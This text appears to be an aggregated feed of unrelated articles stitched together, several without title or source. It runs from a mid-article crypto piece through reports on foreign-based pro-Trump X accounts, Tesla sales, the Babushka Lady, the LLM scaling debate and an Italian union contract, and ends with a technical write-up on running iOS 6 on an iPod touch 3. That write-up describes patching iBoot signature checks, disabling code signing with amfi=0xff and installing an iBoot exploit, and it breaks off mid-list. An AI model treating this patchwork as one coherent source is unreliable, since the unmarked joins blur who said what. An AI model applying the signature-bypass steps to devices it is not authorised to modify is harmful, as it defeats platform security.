While bitcoin and ether sellers can find buyers, companies with more niche tokens will find it more difficult to raise money from their holdings, according to Morgan McCarthy. “When you’ve got a medical device company buying some long-tail asset in crypto, a niche in a niche market, it is not going to end well,” he said, adding that 95 percent of digital asset treasuries “will go to zero.”
Strategy, meanwhile, has doubled down and bought even more bitcoin as the price of the token has fallen to $87,000, from $115,000 a month ago. The firm also faces the looming possibility of being cut from some major equity indices, which could heap even more selling pressure on the stock.
But Saylor has brushed off any concerns. “Volatility is Satoshi’s gift to the faithful,” he said this week, referring to the pseudonymous creator of bitcoin.
Foreign interference or opportunistic grifting: why are so many pro-Trump X accounts based in Asia?
Guardian
www.theguardian.com
2025-11-27 00:01:12
A new feature on the social media platform formerly known as Twitter allows users to see the location of other accounts. It has resulted in a firestorm of recriminations When X rolled out a new feature revealing the locations of popular accounts, the company was acting to boost transparency and clam...
W
hen
X
rolled out a new feature revealing the locations of popular accounts, the company was acting to boost transparency and clamp down on disinformation. The result, however, has been a circular firing squad of recriminations, as users turn on each other enraged by the revelation that dozens of popular “America first” and pro-Trump accounts originated overseas.
The new feature
was enabled over the weekend
by X’s head of product, Nikita Bier, who called it the first step in “securing the integrity of the global town square.” Since then many high-engagement accounts that post incessantly about US politics have been “unmasked” by fellow users.
An Ivanka Trump fan account that posts about illegal immigration to the US was shown to be based in Nigeria. MAGAStorm, spreading conspiracy theories about the assassination attempt on Trump, was found to be in eastern Europe. AmericanVoice which posts anti-Islam content, is based in India.
Users have noted that a high proportion of these potentially misleading accounts – many of which claim to be in America – are operating from Asia, but experts are in disagreement over whether they may be state-backed influence campaigns or even opportunists trying to make a quick buck.
Monetising ‘rage bait’
In 2024 the
Centre for Information Resilience
(CIR) revealed that a network of accounts on X were posing as young American women, stealing images from European influencers to burnish their credibility. Often these images were manipulated to include pro-Trump hats and clothing.
The new location feature on X has allowed Benjamin Strick, who ran the original investigation, to confirm that almost all of these accounts purporting to be “independent Trump supporting” women are located in Thailand.
Strick noted that while promising to “follow patriots” and “stand with Trump”, these accounts often also posted anti-Islamic content too.
In their 2024 report, the CIR found that these accounts exploited “pre-existing societal tensions” in their efforts to spread disinformation.
“Accounts seized upon news stories relating to gender and LGBTQ+ rights, in some cases allowing them to undermine Democratic policies and promote Republican views.”
Fears that foreign actors are using social media to influence US voters reached their zenith in the months after Trump’s 2016 election win over Hillary Clinton. An intelligence assessment the following year detailed the steps that the Russian state took to bolster Trump using bot farms.
In the years since, experts have warned that foreign influence campaigns are becoming more sophisticated, but as America’s politics has become more partisan and voters more siloed, those warnings appear to have been forgotten.
However it’s possible though that the sheer number of pro-Trump accounts around the world might have as much to do with turning a profit as political influence, says Simon Copland, a researcher at the Australian National University.
“Social media is really based on attention … [and] on places like X or Twitter you can get money from that,” he says, adding that at the moment, the best way to get attention “is to be posting about
Donald Trump
.”
Changes to the way X monetises its content could be a factor as well. In 2024, the platform announced that creators would now be paid based on the levels of engagement with their content. At the time, some expressed concern that this would incentivise users to create more and more controversial content.
“When platforms begin to reward engagement, creators will begin posting anything that drives a discussion of some sort, including posts that are designed to enrage users, forcing them to reply or comment,” TechCrunch wrote at the time.
“That’s where things like rage bait come about,” says Copland. “People deliberately induce rage to try to encourage people to go on to the platforms” and engage in the content.
The calculations used to determine a user’s payments remain opaque and it’s not clear how much money overseas users posing as Maga-faithful could be making. A BBC investigation from 2024 suggested that for some, it could be thousands of dollars. Experts in southeast Asia’s disinformation space say such figures could be highly motivating for people in the region.
A 2021 report into southeast Asia’s “disinformation crisis” found that many accounts pushing xenophobic and misogynistic messages to appeal to the US right were not particularly invested ideologically, but “driven by almost purely entrepreneurial motivations.”
The ‘dark corners’ of the internet
While the perpetually online cadre of Trump’s followers erupt in anger over the origins of some accounts – many of which have now been suspended – others have been left questioning why the issue matters at all.
Copland points to the flow of rightwing ideas, and how policies dreamed up in dank corners of the internet can make their way to the heights of US and European politics.
On the night that X began to reveal the location of accounts, Donald Trump shared a post from an account called Trump_Army_. With nearly 600,000 followers, the account regularly amplifies conspiracy theories; in a recent post it asked its followers if “JFK was killed for trying to expose the same crooks Trump is now exposing”. Soon after, another user pointed out that Trump_Army_ was based in India.
It’s among the more innocuous examples, but illustrative of the way the wider ecosystem of right-wing politics operates online.
“Extreme ideas start in these dark corners of the internet. They spread, they become memes, they go on to more mainstream platforms and then you see politicians pick them up,” says Copland. ‘
In May, Trump
ambushed South African president Cyril Ramaphosa
in the Oval Office, accusing him of turning a blind eye to a “white genocide” against South African farmers. These widely discredited claims are thought to have in-part originated in far-right chatrooms.
“We have to be taking this stuff seriously,” he warns, because these ideas “are suddenly becoming mainstream.”
X was approached for comment.
Valhalla's Things: PDF Planners 2026
PlanetDebian
blog.trueelena.org
2025-11-27 00:00:00
Posted on November 27, 2025
Tags: madeof:atoms, madeof:bits, craft:bookbinding
A few years ago I wrote some planner generating code to make myself a
custom planner; in November 2023 I generated a few, and posted them
here on the blog...
A few years ago I wrote some
planner generating code
to make myself a
custom planner; in
November 2023
I generated a few, and posted them
here on the blog, in case somebody was interested in using them.
In 2024 I tried to do the same, and ended up being even more late, to
the point where I didn’t generate any (uooops).
I did, however, start to write a Makefile to automate the generation
(and got stuck on the fact that there wasn’t an easy way to deduce the
correct options needed from just the template name); this year, with the
same promptness as in 2023 I got back to the Makefile and finished it, so
maybe next year I will be able to post them early enough for people to
print and bind them? maybe :)
Anyway, these are all of the variants I currently generate, for 2026.
The files with
-book
in the name have been imposed on A4 paper for a
16 pages signature. All of the fonts have been converted to paths, for
ease of printing (yes, this means that customizing the font requires
running the script, but the alternative also had its drawbacks).
Some of the planners include ephemerids and moon phase data: these have
been calculated for the town of Como, and specifically for
geo:45.81478,9.07522?z=17
, because that’s what
everybody
needs, right?
If you need the ephemerids for a different location and can’t run the
script yourself (it depends on pdfjam, i.e. various GB of LaTeX, and a
few python modules such as dateutil, pypdf and jinja2), feel free to
ask: unless I receive too many requests to make this sustainable I’ll
generate them and add them to this post.
I hereby release all the PDFs linked in this blog post under the
CC0
license
.
You may notice that I haven’t decided on a license for the code dump
repository; again if you need it for something (that is compatible with
its unsupported status) other than running it for personal use (for
which afaik there is an implicit license) let me know and I’ll push
“decide on a license” higher on the stack of things to do :D
Finishing the Makefile meant that I had to add a tiny feature to one of
the scripts involved, which required me to add a dependency to
pypdf
:
up to now I have been doing the page manipulations with
pdfjam
, which
is pretty convenient to use, but also uses LaTeX, and apparently not
every computer comes with texlive installed (shocking, I know).
If I’m not mistaken, pypdf can do all of the things I’m doing with
pdfjam, so maybe for the next year I could convert my script to use that
one instead.
But then the planners 2027 will be quick and easy, and I will be able to
publish them
promptly
, right?
Running to the Press
Daring Fireball
daringfireball.net
2025-11-26 23:55:20
Regarding my earlier post on similarities between the 2010 App Store Guidelines and today’s: Notably absent from the current guidelines (I think for a very long time) is the specious but very Jobsian claim that “If you run to the press and trash us, it never helps.” Getting the press on your side is...
(a) Come up with your own ideas. We know you have them, so make
yours come to life. Don’t simply copy the latest popular app
on the App Store, or make some minor changes to another app’s
name or UI and pass it off as your own. In addition to risking
an intellectual property infringement claim, it makes the App
Store harder to navigate and just isn’t fair to your fellow
developers.
(b) Submitting apps which impersonate other apps or services is
considered a violation of the Developer Code of Conduct and
may result in removal from the Apple Developer Program.
(c) You cannot use another developer’s icon, brand, or product
name in your app’s icon or name, without approval from the
developer.
It’s guideline (c) that’s new, but I like guideline (a) here. Not just the intent of it, but the language. It’s clear, direct, and human. It reminds me of the tone of the very early guidelines, when it seemed like Steve Jobs’s voice was detectable in some of them.
In a post back in 2010, I wrote
:
This new document is written in remarkably casual language. For
example, a few bullet items from the beginning:
We have over 250,000 apps in the App Store. We don’t need any
more Fart apps.
If your app doesn’t do something useful or provide some form of
lasting entertainment, it may not be accepted.
If your App looks like it was cobbled together in a few days, or
you’re trying to get your first practice App into the store to
impress your friends, please brace yourself for rejection. We
have lots of serious developers who don’t want their quality
Apps to be surrounded by amateur hour.
We will reject Apps for any content or behavior that we believe
is over the line. What line, you ask? Well, as a Supreme Court
Justice once said, “I’ll know it when I see it”. And we think
that you will also know it when you cross it.
If your app is rejected, we have a Review Board that you can
appeal to. If you run to the press and trash us, it never helps.
Some of that language remains today. Here’s the current guideline for section 4.3:
4.3 Spam [...]
(b) Also avoid piling on to a category that is already saturated;
the App Store has enough fart, burp, flashlight, fortune
telling, dating, drinking games, and Kama Sutra apps, etc.
already. We will reject these apps unless they provide a
unique, high-quality experience. Spamming the store may lead
to your removal from the Apple Developer Program.
I could be wrong, but my sense is that Apple has, without much fanfare, cracked down on scams and rip-offs in the App Store. That doesn’t mean there’s none. But it’s like crime in a city: a low amount of crime is the practical ideal, not zero crime. Maybe Apple has empowered something like the “
bunco squad
” I’ve wanted for years? If I’m just unaware of blatant rip-offs running wild in the App Store, send examples my way.
★
Wednesday, 26 November 2025
Tesla's European sales tumble nearly 50% in October
Tesla's (
TSLA
) Europe woes are only getting worse.
According to the
European Automobile Manufacturers' Association
(ACEA), Tesla electric vehicle registrations (a proxy for sales) in Europe fell to just 6,964 units in October, a 48.5% drop compared to a year ago. Meanwhile, total EV registrations in the region, which includes the UK and the European Free Trade Association, rose 32.9% in October, with overall registrations regardless of powertrain up 4.9%.
October's total marks the 10th straight month of declining Tesla sales in Europe. Meanwhile, the overall market share of EVs in the broader European region grew to 16.4%.
Tesla's sales hangover rolled on in certain key European territories, with the introduction of the revamped Model Y not enough to blunt the effect of rising competition and CEO Elon Musk's deep unpopularity.
October's sales slide follows a rough 2025 for Tesla year to date in broader Europe.
In the first 10 months of the year, Tesla sales dropped 29.6% to 180,688 units, per the ACEA. Conversely, Tesla's overall market share in Europe dropped to 1.6% from 2.4% a year ago.
Meanwhile, Tesla's Chinese competitor BYD (
BYDDY
), which sells a mix of pure EVs and hybrids, reported sales jumping 207% to 17,470 units sold in Europe. Another major China rival, SAIC, saw sales climb 46% to just under 24,000 vehicles sold.
While weakening sales in a key, EV-centric region should be a concern, it hasn't been a significant issue for Tesla stock.
The interior of the new Tesla Model 3 with Full Self-Driving activated, highlighting the advanced autonomous driving system and design of Tesla's electric vehicles, in Bari, Italy, on Sept. 6, 2025. (Matteo Della Torre/NurPhoto via Getty Images)
·
NurPhoto via Getty Images
"One of the reasons we called Tesla a 'must own' in our recent launch — despite all the obvious risks — is that the world is about to change, dramatically," analyst Rob Wertheimer wrote. "Autonomy is coming very soon, and it will change everything about the driving ecosystem.”
The main spark appears to be the latest version of Tesla's full self-driving (FSD) software, which is available in the US and select territories.
While investors own Tesla stock mostly for the AI and autonomous potential, there could be good news from the self-driving front for European buyers.
The Netherlands RDW automotive governing body said it has set up a schedule allowing Tesla to demonstrate in February
whether FSD meets requirements
but has not approved it yet.
Getting at least one automotive regulator in Europe to approve FSD would be a huge step in the right direction for Tesla and may help staunch the sales slide in the region.
The Babushka Lady was seen to be holding a camera by eyewitnesses and was also seen in film accounts of the assassination.
[
1
]
[
2
]
She was observed standing on the grass between Elm and Main streets, standing amongst onlookers in front of the Dallas County Building, and is visible in the
Zapruder film
, as well as in the films of
Orville Nix
,
[
3
]
Marie Muchmore
, and Mark Bell,
[
4
]
44 minutes and 47 seconds into the Bell film; even though the shooting had already taken place and most of her surrounding witnesses took cover, she can be seen still standing with the camera at her face. After the shooting, she crossed Elm Street and joined the crowd that went up the
grassy knoll
.
The Babushka Lady is last seen in photographs walking east on Elm Street. Neither she, nor the film she may have taken, have ever been positively identified. Her first appearance on film chronologically is on the sidewalk in front of the Dallas County Building, which is visible in an image as being on Kennedy's right. She would have crossed Houston Street and onto Dealey Plaza in order to be visible in the Dealey Plaza images. This may imply that the images show two different women of similar appearance. It is plausible that once the motorcade passed by she was able to cross the street to catch a second motorcade drive past on Dealey Plaza where she would be on Kennedy's left.
In 1970, a woman named Beverly Oliver told conspiracy researcher Gary Shaw at a church
revival meeting
in
Joshua, Texas
, that she was the Babushka Lady.
[
5
]
Oliver stated that she filmed the assassination with a Super 8 film
Yashica
and that she turned the undeveloped film over to two men who identified themselves to her as FBI agents.
[
5
]
According to Oliver, she obtained no receipt from the men, who told her that they would return the film to her within ten days. She did not follow up with an inquiry.
[
5
]
Oliver reiterated her claims in the 1988 documentary
The Men Who Killed Kennedy
.
[
5
]
According to
Vincent Bugliosi
, Oliver has "never proved to most people's satisfaction that she was in Dealey Plaza that day".
[
5
]
Confronted with the fact that the Yashica Super-8 camera was not made until 1969, she stated that she received the "experimental" camera from a friend and was not sure the manufacturer's name was on it.
[
5
]
Oliver's claims were the basis for a scene in
Oliver Stone
's 1991 film
JFK
, in which a character named "Beverly" meets
Jim Garrison
in a Dallas nightclub.
[
6
]
Played by
Lolita Davidovich
, she is depicted in the
director's cut
as wearing a headscarf at Dealey Plaza and speaking of having given the film she shot to two men claiming to be FBI agents.
In March 1979, the Photographic Evidence Panel of the
United States House Select Committee on Assassinations
indicated that they were unable to locate any film attributed to the Babushka Lady.
[
7
]
According to their report: "Initially,
Robert Groden
, a photographic consultant to the committee advised the panel as to pertinent photographic issues and related materials. Committee investigators located many of the suggested films and photographs, however, some items were never located, i.e. the Babushka Lady film, a color photograph by Norman Similas, and the original negative of the Betzner photograph."
[
7
]
Public hearings of the Assassination Records Review Board
On November 18, 1994, assassination researcher Gary Mack testified before the
Assassination Records Review Board
that he had recently been told by an executive in
Kodak
's Dallas office that a woman in her early 30s with brunette hair brought in film purported to be of the assassination scene while they were processing the
Zapruder film
.
[
8
]
According to Mack, the executive said the woman explained to federal investigators already at the film processing office that she ran from Main Street across the grass to Elm Street where she stopped and snapped a photo with some people in the foreground of the
presidential limousine
and the
Texas School Book Depository
.
[
8
]
Mack said that he was told by the Kodak executive that the photo was extremely blurry and "virtually useless" and indicated that the woman likely went home without anyone recording her identity.
[
8
]
After suggesting that the woman in the story may have been the Babushka Lady, Mack then told the Board: "I do not believe that Beverly Oliver is the Babushka Lady, or, let me rephrase that, she certainly could be but the rest of the story is a fabrication."
[
8
]
Also appearing that same day before the ARRB as "Beverly Oliver Massegee", Oliver stated that she was 17 years old at the time of the assassination.
[
8
]
She told the Board that she was filming with an "experimental"
8 mm movie camera
approximately 20 to 30 feet (6 to 9 m) from Kennedy when he was shot and that the film was confiscated by a man who identified himself as an FBI agent.
[
8
]
According to Oliver, she handed over the camera because the man was an authority figure and because she feared being caught in possession of
marijuana
.
[
8
]
Oliver's claims were addressed point by point and debunked by conspiracy theory researcher John McAdams.
[
9
]
When two of the most influential people in AI both say that
today’s large language models are hitting their limits
, it’s worth paying attention.
In a recent long-form interview,
Ilya Sutskever
– co-founder of OpenAI and now head of Safe Superintelligence Inc. – argued that the industry is moving from an
“age of scaling”
to an
“age of research”
. At the same time,
Yann LeCun
, VP & Chief AI Scientist at Meta, has been loudly insisting that
LLMs are not the future of AI at all
and that we need a completely different path based on “world models” and architectures like
JEPA
.
As developers and founders, we’re building products right in the middle of that shift.
This article breaks down Sutskever’s and LeCun’s viewpoints and what they mean for people actually shipping software.
1. Sutskever’s Timeline: From Research → Scaling → Research Again
Sutskever divides the last decade of AI into three phases:
1.1. 2012–2020: The first age of research
This is the era of “try everything”:
convolutional nets for vision
sequence models and attention
early reinforcement learning breakthroughs
lots of small experiments, new architectures, and weird ideas
There
were
big models, but compute and data were still limited. The progress came from
new concepts
, not massive clusters.
1.2. 2020–2025: The age of scaling
Then scaling laws changed everything.
The recipe became:
More data + more compute + bigger models = better results.
You didn’t have to be extremely creative to justify a multi-billion-dollar GPU bill. You could point to a curve: as you scale up parameters and tokens, performance climbs smoothly.
This gave us:
GPT-3/4 class models
state-of-the-art multimodal systems
the current wave of AI products everyone is building on
1.3. 2025 onward: Back to an age of research (but with huge computers)
Now Sutskever is saying that
scaling alone is no longer enough
:
The industry is already operating at
insane scale
.
The internet is finite, so you can’t just keep scraping higher-quality, diverse text forever.
The returns from “just make it 10× bigger” are getting smaller and more unpredictable.
We’re moving into a phase where:
The clusters stay huge, but
progress depends on new ideas
, not only new GPUs.
2. Why the Current LLM Recipe Is Hitting Limits
Sutskever keeps circling three core issues.
2.1. Benchmarks vs. real-world usefulness
Models look god-tier on paper:
they pass exams
solve benchmark coding tasks
reach crazy scores on reasoning evals
But everyday users still run into:
hallucinations
brittle behavior on messy input
surprisingly dumb mistakes in practical workflows
So there’s a gap between
benchmark performance
and
actual reliability
when someone uses the model as a teammate or co-pilot.
2.2. Pre-training is powerful, but opaque
The big idea of this era was: pre-train on enormous text + images and you’ll learn “everything”.
It worked incredibly well… but it has downsides:
you don’t fully control
what
the model learns
when it fails, it’s hard to tell if the issue is data, architecture, or something deeper
pushing performance often means
more of the same
, not better understanding
That’s why there’s so much focus now on
post-training
tricks: RLHF, reward models, system prompts, fine-tuning, tool usage, etc. We’re papering over the limits of the pre-training recipe.
2.3. The real bottleneck: generalization
For Sutskever, the biggest unsolved problem is
generalization
.
Humans can:
learn a new concept from a handful of examples
transfer knowledge between domains
keep learning continuously without forgetting everything
Models, by comparison, still need:
huge amounts of data
careful evals to avoid weird corner-case failures
extensive guardrails and fine-tuning
Even the best systems today
generalize much worse than people
. Fixing that is not a matter of another 10,000 GPUs; it needs new theory and new training methods.
3. Safe Superintelligence Inc.: Betting on New Recipes
Sutskever’s new company,
Safe Superintelligence Inc. (SSI)
, is built around a simple thesis:
scaling was the driver of the last wave
research will drive the next one
SSI is not rushing out consumer products. Instead, it positions itself as:
focused on
long-term research into superintelligence
trying to invent
new training methods and architectures
putting
safety and controllability
at the core from day one
Instead of betting that “GPT-7 but bigger” will magically become AGI, SSI is betting that
a different kind of model
, trained with different objectives, will be needed.
4. Have Tech Companies Overspent on GPUs?
Listening to Sutskever, it’s hard not to read between the lines:
Huge amounts of money have gone into GPU clusters on the assumption that scale alone would keep delivering step-function gains.
We’re discovering that the
marginal gains from scaling
are getting smaller, and progress is less predictable.
That doesn’t mean the GPU arms race was pointless. Without it, we wouldn’t have today’s LLMs at all.
But it does mean:
The next major improvements will likely come from
smarter algorithms
, not merely
more expensive hardware
.
Access to H100s is slowly becoming a
commodity
, while genuine innovation moves back to
ideas and data
.
For founders planning multi-year product strategies, that’s a big shift.
5. Yann LeCun’s Counterpoint: LLMs Aren’t the Future at All
If Sutskever is saying “scaling is necessary but insufficient,”
Yann LeCun
goes further:
LLMs, as we know them, are not the path to real intelligence.
He’s been very explicit about this in talks, interviews and posts.
5.1. What LeCun doesn’t like about LLMs
LeCun’s core criticisms can be summarized in three points:
Limited understanding
LLMs are great at manipulating text but have a
shallow grasp of the physical world
.
They don’t truly “understand” objects, physics or causality – all the things you need for real-world reasoning and planning.
A product-driven dead-end
He sees LLMs as an amazing product technology (chatbots, assistants, coding helpers) but believes they are
approaching their natural limits
.
Each new model is larger and more expensive, yet delivers smaller improvements.
Simplicity of token prediction
Under the hood, an LLM is just predicting the next token. LeCun argues this is a
very narrow, simplistic proxy for intelligence
.
For him, real reasoning can’t emerge from next-word prediction alone.
5.2. World models and JEPA
Instead of LLMs, LeCun pushes the idea of
world models
– systems that:
learn by watching the world (especially video)
build an internal representation of objects, space and time
can
predict what will happen next
in that world, not just what word comes next
One of the architectures he’s working on is
JEPA – Joint Embedding Predictive Architecture
:
it learns representations by predicting future embeddings rather than raw pixels or text
it’s designed to scale to complex, high-dimensional input like video
the goal is a model that can support
persistent memory, reasoning and planning
5.3. Four pillars of future AI
LeCun often describes four pillars any truly intelligent system needs:
Understanding of the physical world
Persistent memory
Reasoning
Planning
His argument is that today’s LLM-centric systems mostly
hack around
these requirements instead of solving them directly. That’s why he’s increasingly focused on world-model architectures instead of bigger text models.
6. Sutskever vs. LeCun: Same Diagnosis, Different Cure
What’s fascinating is that Sutskever and LeCun
agree on the problem
:
current LLMs and scaling strategies are
hitting limits
simply adding more parameters and data is delivering
diminishing returns
new ideas are required
Where they differ is
how radical the change needs to be
:
Sutskever
seems to believe that the next breakthroughs will still come from the same general family of models – big neural nets trained on massive datasets – but with better objectives, better generalization, and much stronger safety work.
LeCun
believes we need a
new paradigm
: world models that learn from interaction with the environment, closer to how animals and humans learn.
For people building on today’s models, that tension is actually good news: it means there is still a lot of frontier left.
7. What All This Means for Developers and Founders
So what should you do if you’re not running an AI lab, but you
are
building products on top of OpenAI, Anthropic, Google, Meta, etc.?
7.1. Hardware is becoming less of a moat
If the next big gains won’t come from simply scaling, then:
the advantage of “we have more GPUs than you” decreases over time
your real edge comes from
use cases, data, UX and integration
, not raw model size
This is good for startups and agencies: you can piggyback on the big models and still differentiate.
7.2. Benchmarks are not your product
Both Sutskever’s and LeCun’s critiques are a warning against obsessing over leaderboards.
Ask yourself:
Does this improvement meaningfully change what my users can do?
Does it reduce hallucinations in
their
workflows?
Does it make the system more reliable, debuggable and explainable?
User-centric metrics matter more than another +2% on some synthetic reasoning benchmark.
7.3. Expect more diversity in model types
If LeCun’s world models, JEPA-style architectures, or other alternatives start to work, we’ll likely see:
specialized models for
physical reasoning and robotics
LLMs acting as a
language interface
over deeper systems that actually handle planning and environment modeling
more hybrid stacks, where multiple models collaborate
For developers, that means learning to
orchestrate multiple systems
instead of just calling one chat completion endpoint.
7.4. Data, workflows and feedback loops are where you win
No matter who is right about the far future, one thing is clear for product builders:
Owning
high-quality domain data
Designing
tight feedback loops
between users and models
Building
evaluations that match your use case
…will matter more than anything else.
You don’t need to solve world modeling or superintelligence yourself. You need to:
pick the right model(s) for the job
wrap them in workflows that make sense for your users
keep improving based on real-world behavior
8. A Quiet Turning Point
In 2019–2021, the story of AI was simple:
“scale is all you need.”
Bigger models, more data, more GPUs.
Now, two of the field’s most influential figures are effectively saying:
scaling is
not enough
(Sutskever)
LLMs themselves may be a
dead end for real intelligence
(LeCun)
We’re entering a new phase where research, theory and new architectures matter again as much as infrastructure.
For builders, that doesn’t mean you should stop using LLMs or pause your AI roadmap. It means:
focus less on chasing the next parameter count
focus more on
how
intelligence shows up inside your product: reliability, reasoning, planning, and how it fits into real human workflows
The GPU race gave us today’s tools. The next decade will be defined by what we
do
with them – and by the new ideas that finally move us beyond “predict the next token.”
Last week Italy’s metal workers secured a major victory as the unions Fim, Fiom and Uilm, all affiliated to IndustriALL Global Union, signed the renewed National Collective Labour Agreement (NCLA) with Federmeccanica and Assistal after four days of continuous and intense negotiations. The agreement covers more than 1.5 million workers across the country and guarantees a €205(US$ 237.17) increase on minimum contractual salaries over four years, which the unions say is essential to protecting wages amid rising living costs and economic uncertainty.
In June 2025, FIOM, FIM and UILM
staged an eight-hour strike accompanied
by regional demonstrations across Italy, calling out what they described as the employers’ irresponsible refusal to negotiate. Workers across the sector, including those in small and medium-sized enterprises, joined the strike action and additional measures, such as overtime and flexibility blockades, were enforced. Demonstrations sent a clear and unified message: workers would not accept stagnation, wage erosion or further delays. The strike movement strengthened union resolve and demonstrated to employers that metal workers were mobilized, united and prepared to continue the fight to defend purchasing power and secure fair working conditions.
Union negotiators have described this as a crucial victory that ensures long-term wage defence at a moment when many families are facing mounting financial strain. The revised wage structure maintains a system designed to safeguard purchasing power through inflation. The agreement also includes an additional salary quota and a safeguard clause should inflation surge beyond forecasts during the contract period.
General secretaries Ferdinando Uliano, Michele De Palma and Rocco Palombella, from Fim, Fiom and Uilm, said the contract represents not only a negotiation victory, but also the defence of Italy’s national collective bargaining system itself. They emphasized the unity and resolve of the unions throughout the process:
“It was a very hard negotiation, but we closed the gap and signed a strong contract. We protected the purchasing power of metal workers and strengthened rights and protections. The wage increase, the start of a working-time reduction trial and the stabilization of precarious work were our pillars and we achieved them. Today, we can say we saved the national contract, which has never stopped being challenged. This agreement ensures dignity for those who build the industrial heart of Italy. Metal workers are once again writing the history of this country at a time when it needs stability, courage and lasting solutions.”
The contract delivers significant gains in the fight against job insecurity and precarious work, issues that have been central to the unions’ platform. Employers will now be required to stabilize a share of fixed-term workers after 12 months if they wish to extend temporary contracts under specific conditions. Workers employed through staffing agencies will gain the right to permanent employment at the host company after 48 months, an important shift toward fairer and more secure employment for thousands of metal workers.
The agreement also introduces forward-looking changes, including a structured trial to reduce working hours under the guidance of a dedicated commission. Additional improvements include stronger health and safety protections, expanded rights to workplace training, enhanced safeguards for seriously ill and disabled workers and new provisions specifically aimed at preventing violence against women.
IndustriALL general secretary, Atle Høie, praised the agreement and the determination of the Italian unions:
“This is an important victory not only for metal workers in Italy, but for workers everywhere who are fighting against insecurity, declining wages and the erosion of fundamental rights. By securing real wage protection, pathways to stable employment and groundbreaking progress on working-time reduction, Fim, Fiom and Uilm have shown what strong, united unions can achieve. This agreement sends a clear message: collective bargaining remains one of the most powerful tools workers have to build fairer, safer and more dignified workplaces.”
Earlier this year I
demoed
iOS 6 running on an iPod touch 3 - a device that Apple never gave iOS 6 to, making iOS 5.1.1 the latest build it can run
A few months later I also released a
script
that generates an iOS 6 restore image installable on that iPod touch model
This article describes technical details behind this work. Certain proficiency in iOS internals is assumed
I'll show you what iOS is made of
First of all, let's recap what software components iOS consists of:
iBoot
- the bootloader. Has 4 different types for different scenarios - iBSS, iBEC, LLB and iBoot
Kernelcache
- the OS kernel + kernel extensions (drivers) built into a single binary blob
DeviceTree
- structured list of hardware used by specific device model + some parameters that specify software behavior. The copy included in an IPSW is more of a template that is heavily modified by iBoot before jumping into kernel
Userspace filesystem - tiny
restore ramdisk
used purely for OS installation or the actual
root filesystem
of iOS installed persistently
Various firmwares for coprocessors, be they internal or external to the main SoC - like, baseband, Wi-Fi, Bluetooth, multitouch and etc.
iPhone 3GS tests
iPhone 3GS was released the same year as iPod touch 3 (2009), and has a very similar hardware (
S5L8920X
SoC vs.
S5L8922X
). But the most important part is that it actually got iOS 6 officially
Before doing anything on the iPod I decided to try to boot iOS 6.0 with iOS 5.1.1 iBoot & DeviceTree on the iPhone and see what's gonna break and how
DeviceTree
The most broken thing was DeviceTree - iOS 6 added a lot of new nodes and properties. To fix it in automated manner I wrote a stupid Python script that decodes and computes a diff between 2 DeviceTrees. Such diff can also be applied to another DeviceTree
As I mentioned above a lot of things in a DeviceTree is filled by iBoot at runtime. One of such new properties is
nvram-proxy-data
in
chosen
node
The property must contain a raw NVRAM dump - leaving it empty will make kernel get stuck somewhere very early
For iPod touch 3 I also had to clean-up the diff out of iPhone-specific things before applying it to iPod's 5.1.1 DeviceTree
iBoot
iBoot didn't require any major changes in this case. Just typical Image3 signature check patch, boot-args injection and
debug-enabled
patch so kernel is going to actually respect AMFI boot-args
One important thing is to actually populate
nvram-proxy-data
dynamically, at least for normal boots (aka non-restore). Restore boot will be fine with some random NVRAM hardcoded into DeviceTree, but normal one will overwrite your actual NVRAM with the random one if it decides to sync it at some point
I do it by replacing a call to
UpdateDeviceTree()
with my own little function that calls the real
UpdateDeviceTree()
, but also populates actual
nvram-proxy-data
and
random-seed
(this one shouldn't be of any importance)
For boot-args I always add
amfi=0xff
to disable code-signing, but that's pretty cannonical as well
Please note that other iBoot+kernel combos might require more changes - if you ever try something and it doesn't work, I recommend looking into DeviceTree differences (both the initial template and how iBoot fills it) and also
boot_args
structure iBoot passes to kernel (not to be confused with boot-args
string
, the
boot_args
structure
is a different thing)
Kernelcache
The most complex part. iPod touch 3 never got iOS 6 officialy, yes, but it was rumored that initially it was meant to have it, but Apple's marketing team said no. Either way, almost every internal iOS 6 build got both standalone S5L8922X kernel and even standalone kexts (including ones specific to iPod touch 3)
The question is how to load them all simultaneously. My initial idea was to do it just as older Mac OS X could do - load all kexts dynamically on bootloader level. Long story short, my strategy was the following:
In iBoot context, load all kexts from filesystem - binary itself + Info.plist
Lay them out in memory and add corresponding entries to
chosen/memory-map
node of DeviceTree
Boot standalone kernel which will then pick them up and load
The sad outcome:
panic(cpu 0 caller 0x802e5223): "kern_return_t kxld_link_file(KXLDContext *, u_char *, u_long, const char *, void *, KXLDDependency *, u_int, u_char **, kxld_addr_t *) (com.apple.kec.corecrypto) called in kernel without kxld support"
The kernel has all the code to pick them up, but not to actually link...
Glueing a prelinked kernelcache
So creating a legit kernelcache is the only way after all. I was already imagining all the horrors of writing software to parse and apply
LINKEDIT
and etc., but then it occured to me! Mac OS X (before Apple Silicon) was generating such kernelcaches somehow! What if we use that logic to build our iOS kernelcache?
I used
/usr/local/bin/kcgen
from internal Sierra build (can be found online as "Phoenix A1708.dmg"), but it seems that even latest macOS
kextcache
can do it (included by default)
Here is a breakdown of the options:
-c output.bin
- output file to write resulting kernelcache to
$(cat n18.10A403.kextlist | sed 's/^/--bundle-id /')
- this weird expression appends
--bundle-id
to every line from the file at
n18.10A403.kextlist
. This is to specify which kexts we'd like to include. How I created such list is described below
-arch armv7
- obviously only build armv7 slice
-all-personalities
- very important flag that prevents
irrelevant
IOKit personalities to be stripped. "Irrelevant" as in "irrelevant to current machine", meaning everything
relevant
to iPod touch 3 is going to be stripped
-strip-symbols
- strips unnecessary symbols. This flag can be omitted theoretically, but I recommend keeping it to make resulting kernelcache smaller
-uncompressed
- do not apply compression. Since we'll have to change one little thing later, compression would have to be reapplied anyway
--
means the rest of the args will point to directories to grab kexts from
kernels_kexts_10A63970m/Extensions
is a path to a folder containing kexts
The little thing to do is to remove fat header. For some reason, it creates a fat Mach-O with a single slice. iBoot doesn't like it, so let's strip it:
lipo -thin armv7 output.bin -o output.thin.bin
The kernel cache is ready now! Just needs to be compressed and packaged into Image3 container
About kext lists
Once again I compared iPhone 3GS' iOS 5.1.1 vs. 6.0 - some kexts were added, some removed, some changed their bundle IDs, some were irrelevant for iPod touch 3
Do not forget to include the pseudo-extensions as well!
In this specific case I had to patch up Info.plist of the Wi-Fi kext. As always there is a sample in the
repo
Restore ramdisk filesystem
Pretty cannonical here. I patched
asr
as usual and also had to move
options.n88.plist
to
options.n18.plist
so it can lay out partitions properly
However, I also have to install the iBoot exploit. To do that I reimplement
rc.boot
binary:
Remount ramdisk and set
umask
just like the original one does
Call
restored_external
, but with
-server
